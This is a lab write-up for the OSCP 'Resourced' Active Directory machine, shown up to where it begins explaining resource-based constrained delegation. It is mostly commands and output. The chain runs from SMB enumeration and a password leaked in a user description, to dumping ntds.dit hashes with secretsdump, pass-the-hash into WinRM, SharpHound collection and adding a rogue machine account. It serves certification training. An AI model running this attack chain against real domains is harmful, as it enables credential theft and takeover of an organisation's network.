---
title: '[OSCP, PEN-200] Proving Grounds Practice - Active Directory'
disqus: hackmd
---
[OSCP, PEN-200] Proving Grounds Practice - Active Directory
===
# Table of Contents
[TOC]
# Resourced

## Solution
### 1. Recon
#### 1.1 Nmap
```
┌──(chw㉿CHW)-[~/Resourced]
└─$ nmap -sC -sV -p- 192.168.122.175
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-24 23:33 EDT
Nmap scan report for 192.168.122.175
Host is up (0.091s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-25 03:37:51Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: resourced.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: resourced.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: resourced
| NetBIOS_Domain_Name: resourced
| NetBIOS_Computer_Name: RESOURCEDC
| DNS_Domain_Name: resourced.local
| DNS_Computer_Name: ResourceDC.resourced.local
| DNS_Tree_Name: resourced.local
| Product_Version: 10.0.17763
|_ System_Time: 2025-03-25T03:38:41+00:00
|_ssl-date: 2025-03-25T03:39:20+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=ResourceDC.resourced.local
| Not valid before: 2025-03-24T03:32:50
|_Not valid after: 2025-09-23T03:32:50
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
49708/tcp open msrpc Microsoft Windows RPC
Service Info: Host: RESOURCEDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-03-25T03:38:41
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 345.10 seconds
```
> DNS, Kerberos, SMB, WinRM, kpasswd5, LDAP, RPC
#### 1.2 SMB
```
┌──(chw㉿CHW)-[~/Resourced]
└─$ enum4linux -a 192.168.122.175
...
==========================( Enumerating Workgroup/Domain on 192.168.122.175 )==========================
[E] Can't find workgroup/domain
...
===============================( Getting domain SID for 192.168.122.175 )===============================
Domain Name: resourced
Domain Sid: S-1-5-21-537427935-490066102-1511301751
...
======================================( Users on 192.168.122.175 )======================================
index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0xf72 RID: 0x457 acb: 0x00020010 Account: D.Durant Name: (null) Desc: Linear Algebra and crypto god
index: 0xf73 RID: 0x458 acb: 0x00020010 Account: G.Goldberg Name: (null) Desc: Blockchain expert
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xf6d RID: 0x452 acb: 0x00020010 Account: J.Johnson Name: (null) Desc: Networking specialist
index: 0xf6b RID: 0x450 acb: 0x00020010 Account: K.Keen Name: (null) Desc: Frontend Developer
index: 0xf10 RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0xf6c RID: 0x451 acb: 0x00000210 Account: L.Livingstone Name: (null) Desc: SysAdmin
index: 0xf6a RID: 0x44f acb: 0x00020010 Account: M.Mason Name: (null) Desc: Ex IT admin
index: 0xf70 RID: 0x455 acb: 0x00020010 Account: P.Parker Name: (null) Desc: Backend Developer
index: 0xf71 RID: 0x456 acb: 0x00020010 Account: R.Robinson Name: (null) Desc: Database Admin
index: 0xf6f RID: 0x454 acb: 0x00020010 Account: S.Swanson Name: (null) Desc: Military Vet now cybersecurity specialist
index: 0xf6e RID: 0x453 acb: 0x00000210 Account: V.Ventz Name: (null) Desc: New-hired, reminder: HotelCalifornia194!
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[M.Mason] rid:[0x44f]
user:[K.Keen] rid:[0x450]
user:[L.Livingstone] rid:[0x451]
user:[J.Johnson] rid:[0x452]
user:[V.Ventz] rid:[0x453]
user:[S.Swanson] rid:[0x454]
user:[P.Parker] rid:[0x455]
user:[R.Robinson] rid:[0x456]
user:[D.Durant] rid:[0x457]
user:[G.Goldberg] rid:[0x458]
==========================( Password Policy Information for 192.168.122.175 )==========================
[+] Attaching to 192.168.122.175 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:192.168.122.175)
[+] Trying protocol 445/SMB...
[+] Found domain(s):
[+] resourced
[+] Builtin
[+] Password Info for Domain: resourced
[+] Minimum password length: 7
[+] Password history length: 24
[+] Maximum password age: 41 days 23 hours 53 minutes
[+] Password Complexity Flags: 000001
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 1
[+] Minimum password age: 1 day 4 minutes
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Enabled
Minimum Password Length: 7
=====================================( Groups on 192.168.122.175 )=====================================
[+] Getting builtin groups:
group:[Server Operators] rid:[0x225]
group:[Account Operators] rid:[0x224]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[Storage Replica Administrators] rid:[0x246]
[+] Getting builtin group memberships:
Group: IIS_IUSRS' (RID: 568) has member: Couldn't lookup SIDs
Group: Administrators' (RID: 544) has member: Couldn't lookup SIDs
Group: Users' (RID: 545) has member: Couldn't lookup SIDs
Group: Remote Desktop Users' (RID: 555) has member: Couldn't lookup SIDs
Group: Remote Management Users' (RID: 580) has member: Couldn't lookup SIDs
Group: Guests' (RID: 546) has member: Couldn't lookup SIDs
Group: Windows Authorization Access Group' (RID: 560) has member: Couldn't lookup SIDs
Group: Pre-Windows 2000 Compatible Access' (RID: 554) has member: Couldn't lookup SIDs
[+] Getting local groups:
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]
[+] Getting local group memberships:
Group: Denied RODC Password Replication Group' (RID: 572) has member: Couldn't lookup SIDs
[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
[+] Getting domain group memberships:
Group: 'Group Policy Creator Owners' (RID: 520) has member: resourced\Administrator
Group: 'Domain Guests' (RID: 514) has member: resourced\Guest
Group: 'Domain Admins' (RID: 512) has member: resourced\Administrator
Group: 'Schema Admins' (RID: 518) has member: resourced\Administrator
Group: 'Domain Users' (RID: 513) has member: resourced\Administrator
Group: 'Domain Users' (RID: 513) has member: resourced\krbtgt
Group: 'Domain Users' (RID: 513) has member: resourced\M.Mason
Group: 'Domain Users' (RID: 513) has member: resourced\K.Keen
Group: 'Domain Users' (RID: 513) has member: resourced\L.Livingstone
Group: 'Domain Users' (RID: 513) has member: resourced\J.Johnson
Group: 'Domain Users' (RID: 513) has member: resourced\V.Ventz
Group: 'Domain Users' (RID: 513) has member: resourced\S.Swanson
Group: 'Domain Users' (RID: 513) has member: resourced\P.Parker
Group: 'Domain Users' (RID: 513) has member: resourced\R.Robinson
Group: 'Domain Users' (RID: 513) has member: resourced\D.Durant
Group: 'Domain Users' (RID: 513) has member: resourced\G.Goldberg
Group: 'Enterprise Admins' (RID: 519) has member: resourced\Administrator
Group: 'Domain Controllers' (RID: 516) has member: resourced\RESOURCEDC$
```
> 1. Domain Name: resourced
> 2. Save the user list as `ADUser.txt`
> 3. `V.Ventz` probable password: `HotelCalifornia194!`
Check SMB using `V.Ventz:HotelCalifornia194!`
```
┌──(chw㉿CHW)-[~/Resourced]
└─$ crackmapexec smb 192.168.122.175 -u 'V.Ventz' -p 'HotelCalifornia194!' --shares
SMB 192.168.122.175 445 RESOURCEDC [*] Windows 10 / Server 2019 Build 17763 x64 (name:RESOURCEDC) (domain:resourced.local) (signing:True) (SMBv1:False)
SMB 192.168.122.175 445 RESOURCEDC [+] resourced.local\V.Ventz:HotelCalifornia194!
SMB 192.168.122.175 445 RESOURCEDC [+] Enumerated shares
SMB 192.168.122.175 445 RESOURCEDC Share Permissions Remark
SMB 192.168.122.175 445 RESOURCEDC ----- ----------- ------
SMB 192.168.122.175 445 RESOURCEDC ADMIN$ Remote Admin
SMB 192.168.122.175 445 RESOURCEDC C$ Default share
SMB 192.168.122.175 445 RESOURCEDC IPC$ READ Remote IPC
SMB 192.168.122.175 445 RESOURCEDC NETLOGON READ Logon server share
SMB 192.168.122.175 445 RESOURCEDC Password Audit READ
SMB 192.168.122.175 445 RESOURCEDC SYSVOL READ Logon server share
```
Download the shares to the local machine
```
┌──(chw㉿CHW)-[~/Resourced/SMB_Ventz]
└─$ smbclient //192.168.122.175/'Password Audit' -U 'V.Ventz' -c "recurse ON; prompt OFF; mget *"
Password for [WORKGROUP\V.Ventz]:
getting file \Active Directory\ntds.dit of size 25165824 as Active Directory/ntds.dit (2213.7 KiloBytes/sec) (average 2213.7 KiloBytes/sec)
...
┌──(chw㉿CHW)-[~/Resourced/SMB_Ventz]
└─$ smbclient //192.168.122.175/NETLOGON -U 'V.Ventz' -c "recurse ON; prompt OFF; mget *"
┌──(chw㉿CHW)-[~/Resourced/SMB_Ventz]
└─$ smbclient //192.168.122.175/SYSVOL -U 'V.Ventz' -c "recurse ON; prompt OFF; mget *"
Password for [WORKGROUP\V.Ventz]:
NT_STATUS_ACCESS_DENIED listing \resourced.local\DfsrPrivate\*
...
┌──(chw㉿CHW)-[~/Resourced/SMB_Ventz]
└─$ tree
.
├── Paaaword Audit
│ ├── Active Directory
│ │ ├── ntds.dit
│ │ └── ntds.jfm
│ └── registry
│ ├── SECURITY
│ └── SYSTEM
└── SYSVOL
└── resourced.local
├── DfsrPrivate
├── Policies
│ ├── {31B2F340-016D-11D2-945F-00C04FB984F9}
│ │ ├── GPT.INI
│ │ ├── MACHINE
│ │ │ ├── Microsoft
│ │ │ │ └── Windows NT
│ │ │ │ └── SecEdit
│ │ │ │ └── GptTmpl.inf
│ │ │ └── Registry.pol
│ │ └── USER
│ └── {6AC1786C-016F-11D2-945F-00C04fB984F9}
│ ├── GPT.INI
│ ├── MACHINE
│ │ └── Microsoft
│ │ └── Windows NT
│ │ └── SecEdit
│ │ └── GptTmpl.inf
│ └── USER
└── scripts
21 directories, 9 files
```
> `NETLOGON` is empty\
> Inspect the files manually
> > `Paaaword Audit/Active Directory/ntds.dit` and `Paaaword Audit/registry/SYSTEM` (the local copy of the `Password Audit` share) can be used to crack the AD users' passwords
### 2. `ntds.dit` + `SYSTEM`: extract AD user hashes for cracking
```
┌──(chw㉿CHW)-[~/Resourced/SMB_Ventz/Paaaword Audit]
└─$ impacket-secretsdump -ntds "Active Directory/ntds.dit" -system registry/SYSTEM LOCAL
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Target system bootKey: 0x6f961da31c7ffaf16683f78e04c3e03d
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 9298735ba0d788c4fc05528650553f94
[*] Reading and decrypting hashes from Active Directory/ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:12579b1666d4ac10f0f59f300776495f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
RESOURCEDC$:1000:aad3b435b51404eeaad3b435b51404ee:9ddb6f4d9d01fedeb4bccfb09df1b39d:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3004b16f88664fbebfcb9ed272b0565b:::
M.Mason:1103:aad3b435b51404eeaad3b435b51404ee:3105e0f6af52aba8e11d19f27e487e45:::
K.Keen:1104:aad3b435b51404eeaad3b435b51404ee:204410cc5a7147cd52a04ddae6754b0c:::
L.Livingstone:1105:aad3b435b51404eeaad3b435b51404ee:19a3a7550ce8c505c2d46b5e39d6f808:::
J.Johnson:1106:aad3b435b51404eeaad3b435b51404ee:3e028552b946cc4f282b72879f63b726:::
V.Ventz:1107:aad3b435b51404eeaad3b435b51404ee:913c144caea1c0a936fd1ccb46929d3c:::
S.Swanson:1108:aad3b435b51404eeaad3b435b51404ee:bd7c11a9021d2708eda561984f3c8939:::
P.Parker:1109:aad3b435b51404eeaad3b435b51404ee:980910b8fc2e4fe9d482123301dd19fe:::
R.Robinson:1110:aad3b435b51404eeaad3b435b51404ee:fea5a148c14cf51590456b2102b29fac:::
D.Durant:1111:aad3b435b51404eeaad3b435b51404ee:08aca8ed17a9eec9fac4acdcb4652c35:::
G.Goldberg:1112:aad3b435b51404eeaad3b435b51404ee:62e16d17c3015c47b4d513e65ca757a2:::
[*] Kerberos keys from Active Directory/ntds.dit
Administrator:aes256-cts-hmac-sha1-96:73410f03554a21fb0421376de7f01d5fe401b8735d4aa9d480ac1c1cdd9dc0c8
Administrator:aes128-cts-hmac-sha1-96:b4fc11e40a842fff6825e93952630ba2
Administrator:des-cbc-md5:80861f1a80f1232f
RESOURCEDC$:aes256-cts-hmac-sha1-96:b97344a63d83f985698a420055aa8ab4194e3bef27b17a8f79c25d18a308b2a4
RESOURCEDC$:aes128-cts-hmac-sha1-96:27ea2c704e75c6d786cf7e8ca90e0a6a
RESOURCEDC$:des-cbc-md5:ab089e317a161cc1
krbtgt:aes256-cts-hmac-sha1-96:12b5d40410eb374b6b839ba6b59382cfbe2f66bd2e238c18d4fb409f4a8ac7c5
krbtgt:aes128-cts-hmac-sha1-96:3165b2a56efb5730cfd34f2df472631a
krbtgt:des-cbc-md5:f1b602194f3713f8
M.Mason:aes256-cts-hmac-sha1-96:21e5d6f67736d60430facb0d2d93c8f1ab02da0a4d4fe95cf51554422606cb04
M.Mason:aes128-cts-hmac-sha1-96:99d5ca7207ce4c406c811194890785b9
M.Mason:des-cbc-md5:268501b50e0bf47c
K.Keen:aes256-cts-hmac-sha1-96:9a6230a64b4fe7ca8cfd29f46d1e4e3484240859cfacd7f67310b40b8c43eb6f
K.Keen:aes128-cts-hmac-sha1-96:e767891c7f02fdf7c1d938b7835b0115
K.Keen:des-cbc-md5:572cce13b38ce6da
L.Livingstone:aes256-cts-hmac-sha1-96:cd8a547ac158c0116575b0b5e88c10aac57b1a2d42e2ae330669a89417db9e8f
L.Livingstone:aes128-cts-hmac-sha1-96:1dec73e935e57e4f431ac9010d7ce6f6
L.Livingstone:des-cbc-md5:bf01fb23d0e6d0ab
J.Johnson:aes256-cts-hmac-sha1-96:0452f421573ac15a0f23ade5ca0d6eada06ae85f0b7eb27fe54596e887c41bd6
J.Johnson:aes128-cts-hmac-sha1-96:c438ef912271dbbfc83ea65d6f5fb087
J.Johnson:des-cbc-md5:ea01d3d69d7c57f4
V.Ventz:aes256-cts-hmac-sha1-96:4951bb2bfbb0ffad425d4de2353307aa680ae05d7b22c3574c221da2cfb6d28c
V.Ventz:aes128-cts-hmac-sha1-96:ea815fe7c1112385423668bb17d3f51d
V.Ventz:des-cbc-md5:4af77a3d1cf7c480
S.Swanson:aes256-cts-hmac-sha1-96:8a5d49e4bfdb26b6fb1186ccc80950d01d51e11d3c2cda1635a0d3321efb0085
S.Swanson:aes128-cts-hmac-sha1-96:6c5699aaa888eb4ec2bf1f4b1d25ec4a
S.Swanson:des-cbc-md5:5d37583eae1f2f34
P.Parker:aes256-cts-hmac-sha1-96:e548797e7c4249ff38f5498771f6914ae54cf54ec8c69366d353ca8aaddd97cb
P.Parker:aes128-cts-hmac-sha1-96:e71c552013df33c9e42deb6e375f6230
P.Parker:des-cbc-md5:083b37079dcd764f
R.Robinson:aes256-cts-hmac-sha1-96:90ad0b9283a3661176121b6bf2424f7e2894079edcc13121fa0292ec5d3ddb5b
R.Robinson:aes128-cts-hmac-sha1-96:2210ad6b5ae14ce898cebd7f004d0bef
R.Robinson:des-cbc-md5:7051d568dfd0852f
D.Durant:aes256-cts-hmac-sha1-96:a105c3d5cc97fdc0551ea49fdadc281b733b3033300f4b518f965d9e9857f27a
D.Durant:aes128-cts-hmac-sha1-96:8a2b701764d6fdab7ca599cb455baea3
D.Durant:des-cbc-md5:376119bfcea815f8
G.Goldberg:aes256-cts-hmac-sha1-96:0d6ac3733668c6c0a2b32a3d10561b2fe790dab2c9085a12cf74c7be5aad9a91
G.Goldberg:aes128-cts-hmac-sha1-96:00f4d3e907818ce4ebe3e790d3e59bf7
G.Goldberg:des-cbc-md5:3e20fd1a25687673
[*] Cleaning up...
```
> Reduce each `username:RID:LM hash:NT hash:::` line to just the `NT hash` and save the result as ADUser.hash
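As an added example (not part of the original writeup), a small parser for the `impacket-secretsdump` output above that does the `NT hash` extraction programmatically and also performs the checks a password audit of such a dump starts with: empty passwords, stored LM hashes and one hash shared by several accounts. The sample copies four records from the dump above; `svc_backup` is a constructed extra account that reuses a hash.

```python
import re
from collections import defaultdict

# NT hash of the empty password, and the "no LM hash stored" placeholder.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"

# One record per account in the NTLM section: user:rid:lmhash:nthash:::
LINE_RE = re.compile(r"^([^:\s]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")

# Constructed sample in impacket-secretsdump output format. The first four
# records are copied from the writeup's dump; svc_backup is a constructed
# extra account that reuses L.Livingstone's hash to show reuse detection.
SAMPLE_DUMP = [
    "[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)",
    "Administrator:500:aad3b435b51404eeaad3b435b51404ee:12579b1666d4ac10f0f59f300776495f:::",
    "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "RESOURCEDC$:1000:aad3b435b51404eeaad3b435b51404ee:9ddb6f4d9d01fedeb4bccfb09df1b39d:::",
    "L.Livingstone:1105:aad3b435b51404eeaad3b435b51404ee:19a3a7550ce8c505c2d46b5e39d6f808:::",
    "svc_backup:1200:aad3b435b51404eeaad3b435b51404ee:19a3a7550ce8c505c2d46b5e39d6f808:::",
    "[*] Kerberos keys from Active Directory/ntds.dit",
    "Administrator:aes256-cts-hmac-sha1-96:73410f03554a21fb0421376de7f01d5fe401b8735d4aa9d480ac1c1cdd9dc0c8",
    "Administrator:des-cbc-md5:80861f1a80f1232f",
    "[*] Cleaning up...",
]


def parse_secretsdump(lines):
    """Return [(user, rid, lm, nt)] for the NTLM section only. Status lines
    and the Kerberos-key lines do not match LINE_RE and are skipped."""
    entries = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            user, rid, lm, nt = m.groups()
            entries.append((user, int(rid), lm.lower(), nt.lower()))
    return entries


def audit_hashes(entries):
    """Defender-side checks on a dump: accounts with an empty password,
    accounts still storing a real LM hash, and NT hashes shared by more
    than one account (password reuse)."""
    by_nt = defaultdict(list)
    for user, _rid, _lm, nt in entries:
        by_nt[nt].append(user)
    return {
        "empty_password": [u for u, _r, _l, nt in entries if nt == EMPTY_NT],
        "lm_stored": [u for u, _r, lm, _n in entries if lm != EMPTY_LM],
        "shared_nt": {nt: users for nt, users in by_nt.items() if len(users) > 1},
    }


def to_john_input(entries, skip_machine=True):
    """user:nthash lines for john --format=NT. Keeping the username means
    john reports which account a cracked hash belongs to, which a bare hash
    list (as used in the writeup) cannot."""
    out = []
    for user, _rid, _lm, nt in entries:
        if skip_machine and user.endswith("$"):
            continue  # machine account passwords are long random strings
        out.append("%s:%s" % (user, nt))
    return "\n".join(out)


if __name__ == "__main__":
    found = parse_secretsdump(SAMPLE_DUMP)
    print(audit_hashes(found))
    print(to_john_input(found))
```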
### 3. Cracking with John
```
┌──(chw㉿CHW)-[~/Resourced]
└─$ cat ADUser.hash
12579b1666d4ac10f0f59f300776495f
31d6cfe0d16ae931b73c59d7e0c089c0
9ddb6f4d9d01fedeb4bccfb09df1b39d
3004b16f88664fbebfcb9ed272b0565b
3105e0f6af52aba8e11d19f27e487e45
204410cc5a7147cd52a04ddae6754b0c
19a3a7550ce8c505c2d46b5e39d6f808
3e028552b946cc4f282b72879f63b726
913c144caea1c0a936fd1ccb46929d3c
bd7c11a9021d2708eda561984f3c8939
980910b8fc2e4fe9d482123301dd19fe
fea5a148c14cf51590456b2102b29fac
08aca8ed17a9eec9fac4acdcb4652c35
62e16d17c3015c47b4d513e65ca757a2
┌──(chw㉿CHW)-[~/Resourced]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT ADUser.hash
Using default input encoding: UTF-8
Loaded 14 password hashes with no different salts (NT [MD4 128/128 ASIMD 4x2])
Remaining 13 password hashes with no different salts
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:00 DONE (2025-03-25 02:22) 0g/s 15762Kp/s 15762Kc/s 204909KC/s "amo-te"..*7¡Vamos!
Session completed.
```
### 4. crackmapexec winrm (Pass-the-Hash)
crackmapexec did not take the whole ADUser.txt as a user list here, so each user is tried one at a time
```
┌──(chw㉿CHW)-[~/Resourced]
└─$ crackmapexec winrm 192.168.122.175 -u Administrator -H ADUser.hash
SMB 192.168.122.175 5985 RESOURCEDC [*] Windows 10 / Server 2019 Build 17763 (name:RESOURCEDC) (domain:resourced.local)
HTTP 192.168.122.175 5985 RESOURCEDC [*] http://192.168.122.175:5985/wsman
WINRM 192.168.122.175 5985 RESOURCEDC [-] resourced.local\Administrator:12579b1666d4ac10f0f59f300776495f
...
┌──(chw㉿CHW)-[~/Resourced]
└─$ crackmapexec winrm 192.168.122.175 -u M.Mason -H ADUser.hash
┌──(chw㉿CHW)-[~/Resourced]
└─$ crackmapexec winrm 192.168.122.175 -u K.Keen -H ADUser.hash
┌──(chw㉿CHW)-[~/Resourced]
└─$ crackmapexec winrm 192.168.122.175 -u L.Livingstone -H ADUser.hash
SMB 192.168.122.175 5985 RESOURCEDC [*] Windows 10 / Server 2019 Build 17763 (name:RESOURCEDC) (domain:resourced.local)
HTTP 192.168.122.175 5985 RESOURCEDC [*] http://192.168.122.175:5985/wsman
WINRM 192.168.122.175 5985 RESOURCEDC [-] resourced.local\L.Livingstone:12579b1666d4ac10f0f59f300776495f
WINRM 192.168.122.175 5985 RESOURCEDC [-] resourced.local\L.Livingstone:31d6cfe0d16ae931b73c59d7e0c089c0
WINRM 192.168.122.175 5985 RESOURCEDC [-] resourced.local\L.Livingstone:9ddb6f4d9d01fedeb4bccfb09df1b39d
WINRM 192.168.122.175 5985 RESOURCEDC [-] resourced.local\L.Livingstone:3004b16f88664fbebfcb9ed272b0565b
WINRM 192.168.122.175 5985 RESOURCEDC [-] resourced.local\L.Livingstone:3105e0f6af52aba8e11d19f27e487e45
WINRM 192.168.122.175 5985 RESOURCEDC [-] resourced.local\L.Livingstone:204410cc5a7147cd52a04ddae6754b0c
WINRM 192.168.122.175 5985 RESOURCEDC [+] resourced.local\L.Livingstone:19a3a7550ce8c505c2d46b5e39d6f808 (Pwn3d!)
```
>`resourced.local\L.Livingstone:19a3a7550ce8c505c2d46b5e39d6f808`
### 5. Evil-winrm
```
┌──(chw㉿CHW)-[~/Resourced]
└─$ evil-winrm -i 192.168.122.175 -u L.Livingstone -H 19a3a7550ce8c505c2d46b5e39d6f808
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\L.Livingstone\Documents> hostname
ResourceDC
*Evil-WinRM* PS C:\Users\L.Livingstone\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
```
> Neither a local admin nor a domain admin
### ✅ Get User Flag
> The user flag is in `C:\Users\L.Livingstone\Desktop`
## Privilege Escalation
### 6. BloodHound
#### 6.1 Upload and run SharpHound
```
┌──(chw㉿CHW)-[~/Resourced]
└─$ cp /usr/lib/bloodhound/resources/app/Collectors/SharpHound.ps1 .
```
```
*Evil-WinRM* PS C:\Users\L.Livingstone\Documents> upload /home/chw/Resourced/SharpHound.ps1
Info: Uploading /home/chw/Resourced/SharpHound.ps1 to C:\Users\L.Livingstone\Documents\SharpHound.ps1
Data: 1744464 bytes of 1744464 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\L.Livingstone\Documents> powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\L.Livingstone\Documents>
*Evil-WinRM* PS C:\Users\L.Livingstone\Documents> . .\SharpHound.ps1
*Evil-WinRM* PS C:\Users\L.Livingstone\Documents> Invoke-BloodHound -CollectionMethod All -OutputDirectory "C:\Users\L.Livingstone\Documents"
*Evil-WinRM* PS C:\Users\L.Livingstone\Documents> ls
Directory: C:\Users\L.Livingstone\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/24/2025 11:54 PM 11760 20250324235440_BloodHound.zip
-a---- 3/24/2025 11:54 PM 8964 N2NkZDYyMzItY2UxZi00N2ZkLTg4ZmQtNThlNjJlZDQ1NzJh.bin
-a---- 3/24/2025 11:50 PM 1308348 SharpHound.ps1
```
#### 6.2 Download and analyse the results
```
*Evil-WinRM* PS C:\Users\L.Livingstone\Documents> download 20250324235440_BloodHound.zip
Info: Downloading C:\Users\L.Livingstone\Documents\20250324235440_BloodHound.zip to 20250324235440_BloodHound.zip
Info: Download successful!
```
Upload the zip to BloodHound
```
MATCH (u:User) RETURN u
```
Mark `L.Livingstone` as owned ("Mark User As Owned")


> `L.Livingstone` has GenericAll on the DC. But the account has no local admin rights, and Windows local privilege escalation was tried and is not feasible.
### 7. Create a trusted computer account
```
┌──(chw㉿CHW)-[~/Resourced]
└─$ impacket-addcomputer resourced.local/l.livingstone -dc-ip 192.168.122.175 -hashes :19a3a7550ce8c505c2d46b5e39d6f808 -computer-name 'chw' -computer-pass 'chw'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Successfully added machine account chw$ with password chw.
```
> `impacket-addcomputer`: Impacket tool that adds a new machine account to AD\
> `resourced.local/l.livingstone`: domain and username\
> `-dc-ip 192.168.122.175`: IP of the Domain Controller (DC)\
> `-hashes :19a3a7550ce8c505c2d46b5e39d6f808`: the user's NTLM hash (empty LM hash + NT hash) used for authentication (no password needed)\
> `-computer-name 'chw'`: name of the new machine account; what actually gets created is `chw$`\
> `-computer-pass 'chw'`: password of the new machine account, used again in the later steps
The new machine account is then visible from Evil-WinRM
```
*Evil-WinRM* PS C:\Users\L.Livingstone\Documents> Get-ADcomputer chw
DistinguishedName : CN=chw,CN=Computers,DC=resourced,DC=local
DNSHostName :
Enabled : True
Name : chw
ObjectClass : computer
ObjectGUID : 7995573d-8ff5-4865-9ad8-bfc65f318b71
SamAccountName : chw$
SID : S-1-5-21-537427935-490066102-1511301751-4101
UserPrincipalName :
```
### 8. Resource-Based Constrained Delegation (RBCD)
>[!Note]
>🧠 What is RBCD?\
>Resource-Based Constrained Delegation is an AD mechanism that lets a computer account A be authorised to act on a target computer B on behalf of other users. The authorisation is controlled by the resource side (the target computer), not by account A itself.
Escalate from the ordinary domain account l.livingstone to SYSTEM on the Domain Controller
